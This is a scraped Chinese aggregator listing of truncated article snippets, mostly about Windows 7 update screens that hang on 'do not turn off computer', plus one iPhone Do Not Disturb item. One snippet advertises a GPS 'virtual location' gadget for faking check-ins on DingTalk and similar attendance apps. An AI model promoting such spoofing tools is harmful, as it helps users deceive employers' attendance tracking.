2022/11/19 21:17:08 - 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...
关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!关机提示 windows7 正在配…...
2022/11/19 21:17:05 - 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...
钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...
2022/11/19 21:17:05 - 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...
前几天班里有位学生电脑(windows 7系统)出问题了,具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面,长时间没反应,无法进入系统。这个问题原来帮其他同学也解决过,网上搜了不少资料&#x…...
2022/11/19 21:17:04 - 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...
本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法,并在最后教给你1种保护系统安全的好方法,一起来看看!电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中,添加了1个新功能在“磁…...
2022/11/19 21:17:03 - 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...
许多用户在长期不使用电脑的时候,开启电脑发现电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机。。.这要怎么办呢?下面小编就带着大家一起看看吧!如果能够正常进入系统,建议您暂时移…...
2022/11/19 21:17:02 - 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...
配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!配置windows update失败 还原更改 请勿关闭计算机&#x…...
2022/11/19 21:17:01 - 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...
不知道大家有没有遇到过这样的一个问题,就是我们的win7系统在关机的时候,总是喜欢显示“准备配置windows,请勿关机”这样的一个页面,没有什么大碍,但是如果一直等着的话就要两个小时甚至更久都关不了机,非常…...
2022/11/19 21:17:00 - 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...
当电脑出现正在准备配置windows请勿关闭计算机时,一般是您正对windows进行升级,但是这个要是长时间没有反应,我们不能再傻等下去了。可能是电脑出了别的问题了,来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...
2022/11/19 21:16:59 - 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...
我们使用电脑的过程中有时会遇到这种情况,当我们打开电脑之后,发现一直停留在一个界面:“配置Windows Update失败,还原更改请勿关闭计算机”,等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢࿰…...
2022/11/19 21:16:58 - 如何在iPhone上关闭“请勿打扰”
Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...
2022/11/19 21:16:57